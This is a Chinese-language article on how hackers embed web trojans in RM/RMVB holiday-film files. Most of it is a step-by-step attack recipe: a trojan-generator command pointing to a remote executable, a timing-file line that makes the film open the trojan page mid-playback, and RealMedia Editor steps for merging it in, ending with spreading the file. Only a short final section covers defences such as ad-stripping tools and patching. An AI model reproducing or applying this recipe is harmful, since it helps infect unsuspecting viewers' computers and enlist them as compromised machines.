狼愛上了羊 警惕木馬“戀”上賀歲大片

　　時至歲末，各種各樣的賀歲片紛紛出爐，這也是黑客利用夾帶網頁木馬的RM/RMVB電影文件捕捉肉雞的好時節，許多人紛紛中招。那麼黑客是怎麼把網頁木馬加入RM/RMVB電影中的呢?

　　1.RM/RMVB唯一能夾帶網頁木馬的格式

　　在所有電影格式裡面，為什麼就只有RM/RMVB就夾帶網頁木馬呢?這與該格式的發布者Real公司有關。Real公司允許在RM/RMVB格式的文件裡，插入用戶設置的任意網頁鏈接來進行廣告宣傳，當這些網頁鏈接被打開時默認使用的是Real公司的浏覽器。

　　可是沒想到這種方法，沒有給Real公司帶來多少實際利益，卻為黑客提供了一種方便的網頁木馬傳播手段。只需要將網頁木馬的鏈接添加在RM/RMVB裡面，當用戶打開時就會中招。

　　小提示：其他電影格式就只能用捆綁木馬的方式傳播。

　　2.網馬捆綁RM並不難

　　第一步：制作網頁木馬

　　首先准備好一個木馬的服務端程序，將它上傳到網絡空間裡面，得到一個服務端文件的鏈接。現在利用最新的MCAfee網頁木馬生成器來創建一個網頁木馬。先打開系統的命令提示符窗口，在窗口切換到生成器所在的目錄，比如輸入“cd d:”就可以進入D盤。

　　接著執行命令：McAfee [生成HTML文件名]，我們按照程序的提示要求輸入：McAfee http://www.mm.Com/mm.exe cs.Html(如圖1)，既可以在程序目錄創建一個網頁木馬。現在將生成的網頁木馬上傳到網頁空間即可。

創建一個網頁木馬

　　第二步：制作時間文件

　　打開記事本程序，在其中輸入下面的一段代碼：u 00:10:00.0 00:11:00.0 http://www.mm.Com/cs.Html(如圖2)。這段代碼的意思是在影片的第10分鐘到11分鐘的時候，打開後面的“http://www.mm.Com/cs.Html”的這個網頁鏈接，這個網頁鏈接就是我們剛剛設置的網頁木馬的地址，然後將它保存為一個任意名稱的文本文件。

用記事本輸入代碼

　　第三步：制作網馬RM

　　准備一段RM或RMVB視頻文件以及相關的視頻編輯工具RealMedia Editor。接著啟動編輯程序，點擊“文件”菜單下的“打開Real媒體文件”命令，來打開准備好的那段RM/RMVB視頻文件。

　　然後點擊“工具”菜單下的“合並事件”命令，再選擇剛才制作的那個文本文件。最後點擊“文件”菜單下的“RealMedia文件另存為”命令，對這個合並的文件重新進行另存為操作即可(如圖3)。現在將這個惡意的RM文件傳播出去，當人們觀看這個RM/RMVB文件後，就可能通過網頁木馬植入木馬程序。

制作惡意的RM文件

　　3.防范方法

　　當RM或RMVB文件下載到本隊以後，可以通過“超級兔子RM廣告清除器”對文件進行掃描。運行“超級兔子RM廣告清除器”，在“輸入要去除廣告的文件名”中選擇RM文件，再在“輸入新生成的文件名”設置除掉網頁廣告或木馬後的RM文件，然後點擊“開始清除”按鈕就會進行掃描(如圖4)。如果發現廣告信息或木馬信息，就會自動清除並彈出一個對話框提示用戶。其實最簡單方法就是下載完成後，斷掉網絡再進行文件的觀看。

功能強大的超級兔子

　　對於那些嵌入到網頁中的RM/RMVB文件，首先用戶需要安裝最新的系統，以及應用程序的補丁程序。這樣網頁木馬就不能激活漏洞來下載安裝木馬程序，也可以通過IE衛士、金山清理專家、瑞星卡卡的網頁木馬攔截功能，對這些文件中可能存在的網頁木馬進行攔截。

　　總結

　　利用RM/RMVB文件進行網頁木馬傳播，已經是一種非常古老的方法了，但是我們不得不承認它的確是非常有效的。在年終，黑客會制作帶網頁木馬的RM/RMVB熱門賀歲片，大肆傳播，這陣現象將在最近持續一段時間，大家下載電影的時候多留心一下。